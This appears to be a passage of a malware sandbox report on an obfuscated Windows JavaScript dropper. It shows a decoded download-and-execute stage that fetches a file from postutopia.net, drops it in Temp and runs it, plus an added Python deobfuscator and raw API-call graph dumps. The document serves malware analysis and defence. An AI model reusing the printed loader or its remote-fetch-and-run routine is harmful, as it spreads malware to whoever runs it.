U1s, 258393468 - U1s, 258393453 - U1s, 258393461 - U1s, 258393431 - U1s, 258393450 - U1s, 258393458 - U1s, 258393453 - U1s, 258393451 - U1s, 258393468 - U1s, 258393386 - U1s, 258393393 - U1s, 258393411 - U1s, 258393362 - U1s, 258393470 - U1s, 258393449 - U1s, 258393466 - U1s, 258393384 - U1s, 258393454 - U1s, 258393457 - U1s, 258393460 - U1s, 258393453 - U1s, 258393464 - U1s, 258393449 - U1s, 258393468 - U1s, 258393456 - U1s, 258393384 - U1s, 258393413 - U1s, 258393384 - U1s, 
258393454 - U1s, 258393467 - U1s, 258393463 - U1s, 258393398 - U1s, 258393423 - U1s, 258393453 - U1s, 258393468 - U1s, 258393435 - U1s, 258393464 - U1s, 258393453 - U1s, 258393451 - U1s, 258393457 - U1s, 258393449 - U1s, 258393460 - U1s, 258393422 - U1s, 258393463 - U1s, 258393460 - U1s, 258393452 - U1s, 258393453 - U1s, 258393466 - U1s, 258393392 - U1s, 258393402 - U1s, 258393393 - U1s, 258393384 - U1s, 258393395 - U1s, 258393384 - U1s, 258393386 - U1s, 258393399 - U1s, 258393425 - U1s, 258393420 - U1s, 258393439 - U1s, 258393441 - U1s, 258393432 - U1s, 258393426 - U1s, 258393398 - U1s, 258393458 - U1s, 258393467 - U1s, 258393386 - U1s, 258393411 - U1s, 258393362 - U1s, 258393457 - U1s, 258393454 - U1s, 258393384 - U1s, 258393392 - U1s, 258393431 - U1s, 258393450 - U1s, 258393458 - U1s, 258393453 - U1s, 258393451 - U1s, 258393468 - U1s, 258393398 - U1s, 258393435 - U1s, 258393468 - U1s, 258393449 - U1s, 258393468 - U1s, 258393469 - U1s, 258393467 - U1s, 258393384 - U1s, 258393413 - U1s, 258393413 - U1s, 258393384 - U1s, 258393402 - U1s, 258393400 - U1s, 258393400 - U1s, 258393393 - U1s, 258393362 - U1s, 258393475 - U1s, 258393362 - U1s, 258393470 - U1s, 258393449 - U1s, 258393466 - U1s, 258393384 - U1s, 258393435 - U1s, 258393468 - U1s, 258393466 - U1s, 258393453 - U1s, 258393449 - U1s, 258393461 - U1s, 258393384 - U1s, 258393413 - U1s, 258393384 - U1s, 258393462 - U1s, 258393453 - U1s, 258393471 - U1s, 258393384 - U1s, 258393417 - U1s, 258393451 - U1s, 258393468 - U1s, 258393457 - U1s, 258393470 - U1s, 258393453 - U1s, 258393440 - U1s, 258393431 - U1s, 258393450 - U1s, 258393458 - U1s, 258393453 - U1s, 258393451 - U1s, 258393468 - U1s, 258393392 - U1s, 258393386 - U1s, 258393417 - U1s, 258393420 - U1s, 258393431 - U1s, 258393420 - U1s, 258393418 - U1s, 258393398 - U1s, 258393435 - U1s, 258393468 - U1s, 258393466 - U1s, 258393453 - U1s, 258393449 - U1s, 258393461 - U1s, 258393386 - U1s, 258393393 - U1s, 258393411 - U1s, 258393362 - U1s, 258393435 - U1s, 258393468 
- U1s, 258393466 - U1s, 258393453 - U1s, 258393449 - U1s, 258393461 - U1s, 258393398 - U1s, 258393431 - U1s, 258393464 - U1s, 258393453 - U1s, 258393462 - U1s, 258393392 - U1s, 258393393 - U1s, 258393411 - U1s, 258393362 - U1s, 258393435 - U1s, 258393468 - U1s, 258393466 - U1s, 258393453 - U1s, 258393449 - U1s, 258393461 - U1s, 258393398 - U1s, 258393436 - U1s, 258393473 - U1s, 258393464 - U1s, 258393453 - U1s, 258393384 - U1s, 258393413 - U1s, 258393384 - U1s, 258393401 - U1s, 258393411 - U1s, 258393362 - U1s, 258393435 - U1s, 258393468 - U1s, 258393466 - U1s, 258393453 - U1s, 258393449 - U1s, 258393461 - U1s, 258393398 - U1s, 258393439 - U1s, 258393466 - U1s, 258393457 - U1s, 258393468 - U1s, 258393453 - U1s, 258393392 - U1s, 258393431 - U1s, 258393450 - U1s, 258393458 - U1s, 258393453 - U1s, 258393451 - U1s, 258393468 - U1s, 258393398 - U1s, 258393434 - U1s, 258393453 - U1s, 258393467 - U1s, 258393464 - U1s, 258393463 - U1s, 258393462 - U1s, 258393467 - U1s, 258393453 - U1s, 258393418 - U1s, 258393463 - U1s, 258393452 - U1s, 258393473 - U1s, 258393393 - U1s, 258393411 - U1s, 258393362 - U1s, 258393435 - U1s, 258393468 - U1s, 258393466 - U1s, 258393453 - U1s, 258393449 - U1s, 258393461 - U1s, 258393398 - U1s, 258393432 - U1s, 258393463 - U1s, 258393467 - U1s, 258393457 - U1s, 258393468 - U1s, 258393457 - U1s, 258393463 - U1s, 258393462 - U1s, 258393384 - U1s, 258393413 - U1s, 258393384 - U1s, 258393400 - U1s, 258393411 - U1s, 258393362 - U1s, 258393435 - U1s, 258393468 - U1s, 258393466 - U1s, 258393453 - U1s, 258393449 - U1s, 258393461 - U1s, 258393398 - U1s, 258393435 - U1s, 258393449 - U1s, 258393470 - U1s, 258393453 - U1s, 258393436 - U1s, 258393463 - U1s, 258393422 - U1s, 258393457 - U1s, 258393460 - U1s, 258393453 - U1s, 258393392 - U1s, 258393454 - U1s, 258393457 - U1s, 258393460 - U1s, 258393453 - U1s, 258393464 - U1s, 258393449 - U1s, 258393468 - U1s, 258393456 - U1s, 258393396 - U1s, 258393384 - U1s, 258393402 - U1s, 258393393 - U1s, 258393411 - U1s, 
258393362 - U1s, 258393435 - U1s, 258393468 - U1s, 258393466 - U1s, 258393453 - U1s, 258393449 - U1s, 258393461 - U1s, 258393398 - U1s, 258393419 - U1s, 258393460 - U1s, 258393463 - U1s, 258393467 - U1s, 258393453 - U1s, 258393392 - U1s, 258393393 - U1s, 258393411 - U1s, 258393362 - U1s, 258393470 - U1s, 258393449 - U1s, 258393466 - U1s, 258393384 - U1s, 258393439 - U1s, 258393467 - U1s, 258393456 - U1s, 258393435 - U1s, 258393456 - U1s, 258393453 - U1s, 258393460 - U1s, 258393460 - U1s, 258393384 - U1s, 258393413 - U1s, 258393384 - U1s, 258393462 - U1s, 258393453 - U1s, 258393471 - U1s, 258393384 - U1s, 258393417 - U1s, 258393451 - U1s, 258393468 - U1s, 258393457 - U1s, 258393470 - U1s, 258393453 - U1s, 258393440 - U1s, 258393431 - U1s, 258393450 - U1s, 258393458 - U1s, 258393453 - U1s, 258393451 - U1s, 258393468 - U1s, 258393392 - U1s, 258393386 - U1s, 258393439 - U1s, 258393435 - U1s, 258393451 - U1s, 258393466 - U1s, 258393457 - U1s, 258393464 - U1s, 258393468 - U1s, 258393398 - U1s, 258393435 - U1s, 258393456 - U1s, 258393453 - U1s, 258393460 - U1s, 258393460 - U1s, 258393386 - U1s, 258393393 - U1s, 258393411 - U1s, 258393362 - U1s, 258393470 - U1s, 258393449 - U1s, 258393466 - U1s, 258393384 - U1s, 258393463 - U1s, 258393434 - U1s, 258393437 - U1s, 258393430 - U1s, 258393384 - U1s, 258393413 - U1s, 258393384 - U1s, 258393439 - U1s, 258393467 - U1s, 258393456 - U1s, 258393435 - U1s, 258393456 - U1s, 258393453 - U1s, 258393460 - U1s, 258393460 - U1s, 258393398 - U1s, 258393434 - U1s, 258393469 - U1s, 258393462 - U1s, 258393392 - U1s, 258393454 - U1s, 258393457 - U1s, 258393460 - U1s, 258393453 - U1s, 258393464 - U1s, 258393449 - U1s, 258393468 - U1s, 258393456 - U1s, 258393393 - U1s, 258393411 - U1s, 258393362 - U1s, 258393477 - U1s, 258393362 - U1s, 258393477 - U1s, 258393362 - U1s, 258393451 - U1s, 258393449 - U1s, 258393468 - U1s, 258393451 - U1s, 258393456 - U1s, 258393392 - U1s, 258393453 - U1s, 258393393 - U1s, 258393475 - U1s, 258393477 - U1s, 258393362 
- U1s );
                                                    eval ( GFDESM );
                                                    • eval("try{ var Object = new ActiveXObject("MSXML2.XMLHTTP"); Object.Open("GET", "https://postutopia.net/wp-includes/images/smilies/wp.js", false); Object.Send(); var fso = new ActiveXObject("Scripting.FileSystemObject"); var filepath = fso.GetSpecialFolder(2) + "/IDWYPJ.js"; if (Object.Status == 200) { var Stream = new ActiveXObject("ADODB.Stream"); Stream.Open(); Stream.Type = 1; Stream.Write(Object.ResponseBody); Stream.Position = 0; Stream.SaveToFile(filepath, 2); Stream.Close(); var WshShell = new ActiveXObject("WScript.Shell"); var oRUN = WshShell.Run(filepath); } } catch(e){} ") ➔ undefined
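The stage-1 loader above hides its payload as `String.fromCharCode(<constant> - U1s, ...)` and hands the result straight to `eval`; the sandbox's eval hook then shows the decoded stage 2, a download-and-execute routine built from MSXML2.XMLHTTP (fetch), ADODB.Stream (write bytes to disk) and WScript.Shell (run the dropped file). The Python below is an added triage example, not code from the report, the sample or Joe Sandbox: it recovers the stage-1 string statically, with no script engine and so no risk of running the sample, and then pulls the ProgIDs, URL, drop location and Run() call out of the decoded stage. The only inputs it needs are embedded: the key constant plus the first 54 terms of the sample's own argument list as printed above (the full list runs to several thousand terms), and the stage-2 text exactly as the report recorded it. Note the sandbox prints the newline after `try{` as a space; the decoder keeps the original newline.

```python
"""Static decoder for the sample's stage-1 obfuscation and IOC extraction from
the decoded stage 2. Added example; not code from the report or the sample."""
import re

# Constructed input: the key constant and the first 54 terms of the sample's
# actual String.fromCharCode argument list, copied from the report.
SAMPLE_PREFIX = (
    "var U1s = 258393352;\n"
    "var GFDESM = String.fromCharCode ( 258393468 - U1s, 258393466 - U1s, 258393473 - U1s, "
    "258393475 - U1s, 258393362 - U1s, 258393470 - U1s, 258393449 - U1s, 258393466 - U1s, "
    "258393384 - U1s, 258393431 - U1s, 258393450 - U1s, 258393458 - U1s, 258393453 - U1s, "
    "258393451 - U1s, 258393468 - U1s, 258393384 - U1s, 258393413 - U1s, 258393384 - U1s, "
    "258393462 - U1s, 258393453 - U1s, 258393471 - U1s, 258393384 - U1s, 258393417 - U1s, "
    "258393451 - U1s, 258393468 - U1s, 258393457 - U1s, 258393470 - U1s, 258393453 - U1s, "
    "258393440 - U1s, 258393431 - U1s, 258393450 - U1s, 258393458 - U1s, 258393453 - U1s, "
    "258393451 - U1s, 258393468 - U1s, 258393392 - U1s, 258393386 - U1s, 258393429 - U1s, "
    "258393435 - U1s, 258393440 - U1s, 258393429 - U1s, 258393428 - U1s, 258393402 - U1s, "
    "258393398 - U1s, 258393440 - U1s, 258393429 - U1s, 258393428 - U1s, 258393424 - U1s, "
    "258393436 - U1s, 258393436 - U1s, 258393432 - U1s, 258393386 - U1s, 258393393 - U1s, "
    "258393411 - U1s );\n"
    "eval ( GFDESM );\n"
)

# Stage 2 exactly as the sandbox's eval hook recorded it in the report.
STAGE2 = (
    'try{ var Object = new ActiveXObject("MSXML2.XMLHTTP"); '
    'Object.Open("GET", "https://postutopia.net/wp-includes/images/smilies/wp.js", false); '
    'Object.Send(); var fso = new ActiveXObject("Scripting.FileSystemObject"); '
    'var filepath = fso.GetSpecialFolder(2) + "/IDWYPJ.js"; '
    'if (Object.Status == 200) { var Stream = new ActiveXObject("ADODB.Stream"); '
    'Stream.Open(); Stream.Type = 1; Stream.Write(Object.ResponseBody); Stream.Position = 0; '
    'Stream.SaveToFile(filepath, 2); Stream.Close(); '
    'var WshShell = new ActiveXObject("WScript.Shell"); var oRUN = WshShell.Run(filepath); } '
    '} catch(e){} '
)

# Scripting.FileSystemObject SpecialFolderConst values.
FSO_SPECIAL_FOLDERS = {"0": "WindowsFolder", "1": "SystemFolder", "2": "TemporaryFolder"}


def decode_fromcharcode(src: str) -> str:
    """Recover the string the script passes to eval() without executing it.
    Assumes the sample's layout: one integer key `var <name> = <int>;` and one
    String.fromCharCode(...) call whose arguments are all `<int> - <name>`."""
    key_match = re.search(r"var\s+(\w+)\s*=\s*(\d+)\s*;", src)
    if not key_match:
        raise ValueError("integer key constant not found")
    key_name, key = key_match.group(1), int(key_match.group(2))
    call = re.search(r"String\.fromCharCode\s*\((.*?)\)\s*;", src, re.S)
    if not call:
        raise ValueError("String.fromCharCode call not found")
    term_re = re.compile(r"\s*(\d+)\s*-\s*" + re.escape(key_name) + r"\s*")
    out = []
    for term in call.group(1).split(","):
        m = term_re.fullmatch(term)
        if not m:
            raise ValueError(f"unexpected argument: {term.strip()!r}")
        # String.fromCharCode truncates each argument to a 16-bit code unit.
        out.append(chr((int(m.group(1)) - key) & 0xFFFF))
    return "".join(out)


def extract_iocs(js: str) -> dict:
    """Pull COM ProgIDs, URLs, drop locations and Run() calls out of a decoded
    Windows Script Host download-and-execute stage."""
    drops = [
        (FSO_SPECIAL_FOLDERS.get(folder, f"SpecialFolder({folder})"), name)
        for folder, name in re.findall(r'GetSpecialFolder\((\d+)\)\s*\+\s*"([^"]+)"', js)
    ]
    return {
        "progids": sorted(set(re.findall(r'ActiveXObject\("([^"]+)"\)', js))),
        "urls": re.findall(r"""https?://[^\s"']+""", js),
        "drops": drops,
        "executes": re.findall(r"(\w+)\.Run\(([^)]*)\)", js),
    }


if __name__ == "__main__":
    print(repr(decode_fromcharcode(SAMPLE_PREFIX)))
    for key, value in extract_iocs(STAGE2).items():
        print(f"{key}: {value}")
```

`GetSpecialFolder(2)` is the FileSystemObject TemporaryFolder constant, which is why the dropped IDWYPJ.js ends up under the user's Temp directory, the same folder the audio.exe processes listed above were started from. The decoder deliberately refuses any argument that is not `<int> - <key>`, so a variant that mixes in other arithmetic fails loudly instead of producing a silently wrong string.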

                                                      Execution Graph

                                                      Execution Coverage:4.8%
                                                      Dynamic/Decrypted Code Coverage:1.2%
                                                      Signature Coverage:5.1%
                                                      Total number of Nodes:1247
                                                      Total number of Limit Nodes:26
                                                      execution_graph (node and edge dump omitted; the dump is truncated on the page). Windows API calls visible in the graph nodes: VirtualProtect; OleInitialize; GetCurrentProcessId, CreateToolhelp32Snapshot, Module32First, Module32Next (module enumeration); GetModuleHandleA, FindResourceA, LoadResource, LockResource, SizeofResource, FreeResource (resource access); LoadLibraryA, GetProcAddress; VariantInit, VariantClear, SafeArrayCreate, SafeArrayAccessData, SafeArrayCreateVector, SafeArrayDestroy (OLE automation); CloseHandle, FindCloseChangeNotification, Sleep; TlsAlloc, TlsSetValue, TlsGetValue, GetCurrentThreadId, HeapCreate, HeapAlloc, HeapFree, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, InterlockedIncrement, GetCommandLineA, GetModuleFileNameA, GetEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsW, FreeEnvironmentStringsA, WideCharToMultiByte, GetStartupInfoA, GetStdHandle, GetFileType, SetHandleCount, GetLastError, SetLastError (CRT start-up and runtime support).
InterlockedIncrement 14410->14411 14411->14410 14412 414643 InterlockedIncrement 14411->14412 14413 41464e InterlockedIncrement 14411->14413 14412->14411 14413->14385 14418 40d606 LeaveCriticalSection 14414->14418 14416 4106ba 14416->14387 14417->14401 14418->14416 14420 40d629 __sopen_helper 14419->14420 14421 40d64f 14420->14421 14445 40ec4d 14420->14445 14427 40d65f __sopen_helper 14421->14427 14491 411c75 14421->14491 14427->14326 14429 40d680 14433 40d6e0 __lock 62 API calls 14429->14433 14430 40d671 14432 40bfc1 __sopen_helper 62 API calls 14430->14432 14432->14427 14434 40d687 14433->14434 14435 40d6bb 14434->14435 14436 40d68f 14434->14436 14438 40b6b5 __read_nolock 62 API calls 14435->14438 14437 41389c __getstream InitializeCriticalSectionAndSpinCount 14436->14437 14439 40d69a 14437->14439 14440 40d6ac 14438->14440 14439->14440 14441 40b6b5 __read_nolock 62 API calls 14439->14441 14496 40d6d7 14440->14496 14443 40d6a6 14441->14443 14444 40bfc1 __sopen_helper 62 API calls 14443->14444 14444->14440 14499 413d5b 14445->14499 14448 40eaa2 __NMSG_WRITE 62 API calls 14450 40ec79 14448->14450 14449 413d5b __set_error_mode 62 API calls 14453 40ec61 14449->14453 14451 40eaa2 __NMSG_WRITE 62 API calls 14450->14451 14452 40d63e 14451->14452 14454 40eaa2 14452->14454 14453->14448 14453->14452 14455 40eab6 14454->14455 14456 413d5b __set_error_mode 59 API calls 14455->14456 14487 40d645 14455->14487 14457 40ead8 14456->14457 14458 40ec16 GetStdHandle 14457->14458 14460 413d5b __set_error_mode 59 API calls 14457->14460 14459 40ec24 _strlen 14458->14459 14458->14487 14463 40ec3d WriteFile 14459->14463 14459->14487 14461 40eae9 14460->14461 14461->14458 14462 40eafb 14461->14462 14462->14487 14505 40ef42 14462->14505 14463->14487 14466 40eb31 GetModuleFileNameA 14468 40eb4f 14466->14468 14474 40eb72 _strlen 14466->14474 14470 40ef42 _strcpy_s 59 API calls 14468->14470 14471 40eb5f 14470->14471 14472 40e61c __invoke_watson 10 API calls 14471->14472 14471->14474 
14472->14474 14484 40ebb5 14474->14484 14521 411da6 14474->14521 14477 40ebd9 14480 413ce7 _strcat_s 59 API calls 14477->14480 14479 40e61c __invoke_watson 10 API calls 14479->14477 14481 40ebed 14480->14481 14483 40ebfe 14481->14483 14485 40e61c __invoke_watson 10 API calls 14481->14485 14482 40e61c __invoke_watson 10 API calls 14482->14484 14539 413b7e 14483->14539 14530 413ce7 14484->14530 14485->14483 14488 40e7ee 14487->14488 14590 40e7c3 GetModuleHandleW 14488->14590 14494 411c7e 14491->14494 14493 40d66a 14493->14429 14493->14430 14494->14493 14495 411c95 Sleep 14494->14495 14593 40b84d 14494->14593 14495->14494 14623 40d606 LeaveCriticalSection 14496->14623 14498 40d6de 14498->14427 14500 413d6a 14499->14500 14501 40bfc1 __sopen_helper 62 API calls 14500->14501 14502 40ec54 14500->14502 14503 413d8d 14501->14503 14502->14449 14502->14453 14504 40e744 __sopen_helper 6 API calls 14503->14504 14504->14502 14506 40ef53 14505->14506 14507 40ef5a 14505->14507 14506->14507 14512 40ef80 14506->14512 14508 40bfc1 __sopen_helper 62 API calls 14507->14508 14509 40ef5f 14508->14509 14510 40e744 __sopen_helper 6 API calls 14509->14510 14511 40eb1d 14510->14511 14511->14466 14514 40e61c 14511->14514 14512->14511 14513 40bfc1 __sopen_helper 62 API calls 14512->14513 14513->14509 14566 40ba30 14514->14566 14516 40e649 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14517 40e725 GetCurrentProcess TerminateProcess 14516->14517 14518 40e719 __invoke_watson 14516->14518 14568 40ce09 14517->14568 14518->14517 14520 40e742 14520->14466 14526 411db8 14521->14526 14522 411dbc 14523 40bfc1 __sopen_helper 62 API calls 14522->14523 14524 40eba2 14522->14524 14525 411dd8 14523->14525 14524->14482 14524->14484 14527 40e744 __sopen_helper 6 API calls 14525->14527 14526->14522 14526->14524 14528 411e02 14526->14528 14527->14524 14528->14524 14529 40bfc1 __sopen_helper 62 API calls 14528->14529 14529->14525 14531 413cff 14530->14531 14535 413cf8 14530->14535 14532 
40bfc1 __sopen_helper 62 API calls 14531->14532 14533 413d04 14532->14533 14534 40e744 __sopen_helper 6 API calls 14533->14534 14536 40ebc8 14534->14536 14535->14531 14537 413d33 14535->14537 14536->14477 14536->14479 14537->14536 14538 40bfc1 __sopen_helper 62 API calls 14537->14538 14538->14533 14577 4104e0 14539->14577 14542 413ba1 LoadLibraryA 14544 413ccb 14542->14544 14545 413bb6 GetProcAddress 14542->14545 14543 413c53 14548 4104e9 __decode_pointer 6 API calls 14543->14548 14563 413c7e 14543->14563 14544->14487 14545->14544 14547 413bcc 14545->14547 14546 413c29 14546->14543 14549 4104e9 __decode_pointer 6 API calls 14546->14549 14580 41046e TlsGetValue 14547->14580 14552 413c96 14548->14552 14553 413c46 14549->14553 14551 4104e9 __decode_pointer 6 API calls 14551->14544 14561 4104e9 __decode_pointer 6 API calls 14552->14561 14552->14563 14555 4104e9 __decode_pointer 6 API calls 14553->14555 14555->14543 14556 41046e __encode_pointer 6 API calls 14557 413be7 GetProcAddress 14556->14557 14558 41046e __encode_pointer 6 API calls 14557->14558 14559 413bfc GetProcAddress 14558->14559 14560 41046e __encode_pointer 6 API calls 14559->14560 14562 413c11 14560->14562 14561->14563 14562->14546 14564 413c1b GetProcAddress 14562->14564 14563->14551 14565 41046e __encode_pointer 6 API calls 14564->14565 14565->14546 14567 40ba3c __VEC_memzero 14566->14567 14567->14516 14569 40ce11 14568->14569 14570 40ce13 IsDebuggerPresent 14568->14570 14569->14520 14576 4138fc 14570->14576 14573 413706 SetUnhandledExceptionFilter UnhandledExceptionFilter 14574 41372b GetCurrentProcess TerminateProcess 14573->14574 14575 413723 __invoke_watson 14573->14575 14574->14520 14575->14574 14576->14573 14578 41046e __encode_pointer 6 API calls 14577->14578 14579 4104e7 14578->14579 14579->14542 14579->14546 14581 4104a7 GetModuleHandleW 14580->14581 14582 410486 14580->14582 14584 4104c2 GetProcAddress 14581->14584 14585 4104b7 14581->14585 14582->14581 14583 410490 TlsGetValue 14582->14583 
14588 41049b 14583->14588 14587 41049f GetProcAddress 14584->14587 14586 40e76a __crt_waiting_on_module_handle 2 API calls 14585->14586 14589 4104bd 14586->14589 14587->14556 14588->14581 14588->14587 14589->14584 14589->14587 14591 40e7d7 GetProcAddress 14590->14591 14592 40e7e7 ExitProcess 14590->14592 14591->14592 14594 40b900 14593->14594 14600 40b85f 14593->14600 14595 40d2e3 _realloc 6 API calls 14594->14595 14597 40b906 14595->14597 14596 40b870 14599 40ec4d __FF_MSGBANNER 61 API calls 14596->14599 14596->14600 14602 40eaa2 __NMSG_WRITE 61 API calls 14596->14602 14604 40e7ee _doexit 3 API calls 14596->14604 14598 40bfc1 __sopen_helper 61 API calls 14597->14598 14605 40b8f8 14598->14605 14599->14596 14600->14596 14603 40b8bc RtlAllocateHeap 14600->14603 14600->14605 14606 40b8ec 14600->14606 14607 40d2e3 _realloc 6 API calls 14600->14607 14609 40b8f1 14600->14609 14611 40b7fe 14600->14611 14602->14596 14603->14600 14604->14596 14605->14494 14608 40bfc1 __sopen_helper 61 API calls 14606->14608 14607->14600 14608->14609 14610 40bfc1 __sopen_helper 61 API calls 14609->14610 14610->14605 14612 40b80a __sopen_helper 14611->14612 14613 40b83b __sopen_helper 14612->14613 14614 40d6e0 __lock 62 API calls 14612->14614 14613->14600 14615 40b820 14614->14615 14616 40def2 ___sbh_alloc_block 5 API calls 14615->14616 14617 40b82b 14616->14617 14619 40b844 14617->14619 14622 40d606 LeaveCriticalSection 14619->14622 14621 40b84b 14621->14613 14622->14621 14623->14498 14625 40daa0 HeapAlloc 14624->14625 14626 40da6c HeapReAlloc 14624->14626 14627 40da8a 14625->14627 14629 40dac3 VirtualAlloc 14625->14629 14626->14627 14628 40da8e 14626->14628 14627->14330 14628->14625 14629->14627 14630 40dadd HeapFree 14629->14630 14630->14627 14632 40db20 VirtualAlloc 14631->14632 14634 40db67 14632->14634 14634->14334 14635->14337 14636->14301 14638 414474 14637->14638 14640 41447b 14637->14640 14641 4142d1 14638->14641 14640->14157 14642 4142dd __sopen_helper 14641->14642 14672 410735 
14642->14672 14646 4142f0 14693 414070 14646->14693 14649 411c75 __malloc_crt 62 API calls 14650 414311 14649->14650 14651 414430 __sopen_helper 14650->14651 14700 4140ec 14650->14700 14651->14640 14654 414341 InterlockedDecrement 14656 414351 14654->14656 14657 414362 InterlockedIncrement 14654->14657 14655 41443d 14655->14651 14659 414450 14655->14659 14660 40b6b5 __read_nolock 62 API calls 14655->14660 14656->14657 14662 40b6b5 __read_nolock 62 API calls 14656->14662 14657->14651 14658 414378 14657->14658 14658->14651 14663 40d6e0 __lock 62 API calls 14658->14663 14661 40bfc1 __sopen_helper 62 API calls 14659->14661 14660->14659 14661->14651 14664 414361 14662->14664 14666 41438c InterlockedDecrement 14663->14666 14664->14657 14667 414408 14666->14667 14668 41441b InterlockedIncrement 14666->14668 14667->14668 14670 40b6b5 __read_nolock 62 API calls 14667->14670 14710 414432 14668->14710 14671 41441a 14670->14671 14671->14668 14673 4106bc __getptd_noexit 62 API calls 14672->14673 14674 41073d 14673->14674 14675 40e79a __amsg_exit 62 API calls 14674->14675 14676 41074a 14674->14676 14675->14676 14677 413fcc 14676->14677 14678 413fd8 __sopen_helper 14677->14678 14679 410735 __getptd 62 API calls 14678->14679 14680 413fdd 14679->14680 14681 413fef 14680->14681 14682 40d6e0 __lock 62 API calls 14680->14682 14685 413ffd __sopen_helper 14681->14685 14689 40e79a __amsg_exit 62 API calls 14681->14689 14683 41400d 14682->14683 14684 414056 14683->14684 14686 414024 InterlockedDecrement 14683->14686 14687 41403e InterlockedIncrement 14683->14687 14713 414067 14684->14713 14685->14646 14686->14687 14690 41402f 14686->14690 14687->14684 14689->14685 14690->14687 14691 40b6b5 __read_nolock 62 API calls 14690->14691 14692 41403d 14691->14692 14692->14687 14717 40ec86 14693->14717 14696 4140ad 14698 4140b2 GetACP 14696->14698 14699 41409f 14696->14699 14697 41408f GetOEMCP 14697->14699 14698->14699 14699->14649 14699->14651 14701 414070 getSystemCP 74 API calls 14700->14701 
14702 41410c 14701->14702 14703 414117 setSBCS 14702->14703 14706 41415b IsValidCodePage 14702->14706 14709 414180 _memset __setmbcp_nolock 14702->14709 14704 40ce09 ___convertcp 5 API calls 14703->14704 14705 4142cf 14704->14705 14705->14654 14705->14655 14706->14703 14707 41416d GetCPInfo 14706->14707 14707->14703 14707->14709 14908 413e39 GetCPInfo 14709->14908 15041 40d606 LeaveCriticalSection 14710->15041 14712 414439 14712->14651 14716 40d606 LeaveCriticalSection 14713->14716 14715 41406e 14715->14681 14716->14715 14718 40ec99 14717->14718 14722 40ece6 14717->14722 14719 410735 __getptd 62 API calls 14718->14719 14720 40ec9e 14719->14720 14723 40ecc6 14720->14723 14725 414738 14720->14725 14722->14696 14722->14697 14723->14722 14724 413fcc __setmbcp 64 API calls 14723->14724 14724->14722 14726 414744 __sopen_helper 14725->14726 14727 410735 __getptd 62 API calls 14726->14727 14728 414749 14727->14728 14729 414777 14728->14729 14731 41475b 14728->14731 14730 40d6e0 __lock 62 API calls 14729->14730 14732 41477e 14730->14732 14733 410735 __getptd 62 API calls 14731->14733 14740 4146fa 14732->14740 14735 414760 14733->14735 14738 40e79a __amsg_exit 62 API calls 14735->14738 14739 41476e __sopen_helper 14735->14739 14738->14739 14739->14723 14741 4146fe 14740->14741 14742 414730 14740->14742 14741->14742 14743 4145d2 ___addlocaleref 8 API calls 14741->14743 14748 4147a2 14742->14748 14744 414711 14743->14744 14744->14742 14751 414661 14744->14751 14907 40d606 LeaveCriticalSection 14748->14907 14750 4147a9 14750->14735 14752 414672 InterlockedDecrement 14751->14752 14753 4146f5 14751->14753 14754 414687 InterlockedDecrement 14752->14754 14755 41468a 14752->14755 14753->14742 14765 414489 14753->14765 14754->14755 14756 414694 InterlockedDecrement 14755->14756 14757 414697 14755->14757 14756->14757 14758 4146a1 InterlockedDecrement 14757->14758 14759 4146a4 14757->14759 14758->14759 14760 4146ae InterlockedDecrement 14759->14760 14762 4146b1 14759->14762 
14760->14762 14761 4146ca InterlockedDecrement 14761->14762 14762->14761 14763 4146e5 InterlockedDecrement 14762->14763 14764 4146da InterlockedDecrement 14762->14764 14763->14753 14764->14762 14766 41450d 14765->14766 14768 4144a0 14765->14768 14767 41455a 14766->14767 14769 40b6b5 __read_nolock 62 API calls 14766->14769 14780 414581 14767->14780 14819 417667 14767->14819 14768->14766 14776 40b6b5 __read_nolock 62 API calls 14768->14776 14791 4144d4 14768->14791 14771 41452e 14769->14771 14773 40b6b5 __read_nolock 62 API calls 14771->14773 14778 414541 14773->14778 14774 40b6b5 __read_nolock 62 API calls 14779 414502 14774->14779 14775 40b6b5 __read_nolock 62 API calls 14775->14780 14781 4144c9 14776->14781 14777 4145c6 14782 40b6b5 __read_nolock 62 API calls 14777->14782 14785 40b6b5 __read_nolock 62 API calls 14778->14785 14786 40b6b5 __read_nolock 62 API calls 14779->14786 14780->14777 14784 40b6b5 62 API calls __read_nolock 14780->14784 14795 417841 14781->14795 14788 4145cc 14782->14788 14783 40b6b5 __read_nolock 62 API calls 14789 4144ea 14783->14789 14784->14780 14790 41454f 14785->14790 14786->14766 14788->14742 14811 4177fc 14789->14811 14793 40b6b5 __read_nolock 62 API calls 14790->14793 14791->14783 14794 4144f5 14791->14794 14793->14767 14794->14774 14796 4178cb 14795->14796 14797 41784e 14795->14797 14796->14791 14798 41785f 14797->14798 14799 40b6b5 __read_nolock 62 API calls 14797->14799 14800 417871 14798->14800 14801 40b6b5 __read_nolock 62 API calls 14798->14801 14799->14798 14802 417883 14800->14802 14803 40b6b5 __read_nolock 62 API calls 14800->14803 14801->14800 14804 417895 14802->14804 14806 40b6b5 __read_nolock 62 API calls 14802->14806 14803->14802 14805 4178a7 14804->14805 14807 40b6b5 __read_nolock 62 API calls 14804->14807 14808 4178b9 14805->14808 14809 40b6b5 __read_nolock 62 API calls 14805->14809 14806->14804 14807->14805 14808->14796 14810 40b6b5 __read_nolock 62 API calls 14808->14810 14809->14808 14810->14796 14812 41783d 
14811->14812 14813 417809 14811->14813 14812->14794 14814 417819 14813->14814 14815 40b6b5 __read_nolock 62 API calls 14813->14815 14816 41782b 14814->14816 14817 40b6b5 __read_nolock 62 API calls 14814->14817 14815->14814 14816->14812 14818 40b6b5 __read_nolock 62 API calls 14816->14818 14817->14816 14818->14812 14820 417678 14819->14820 14906 41457a 14819->14906 14821 40b6b5 __read_nolock 62 API calls 14820->14821 14822 417680 14821->14822 14823 40b6b5 __read_nolock 62 API calls 14822->14823 14824 417688 14823->14824 14825 40b6b5 __read_nolock 62 API calls 14824->14825 14826 417690 14825->14826 14827 40b6b5 __read_nolock 62 API calls 14826->14827 14828 417698 14827->14828 14829 40b6b5 __read_nolock 62 API calls 14828->14829 14830 4176a0 14829->14830 14831 40b6b5 __read_nolock 62 API calls 14830->14831 14832 4176a8 14831->14832 14833 40b6b5 __read_nolock 62 API calls 14832->14833 14834 4176af 14833->14834 14835 40b6b5 __read_nolock 62 API calls 14834->14835 14836 4176b7 14835->14836 14837 40b6b5 __read_nolock 62 API calls 14836->14837 14838 4176bf 14837->14838 14839 40b6b5 __read_nolock 62 API 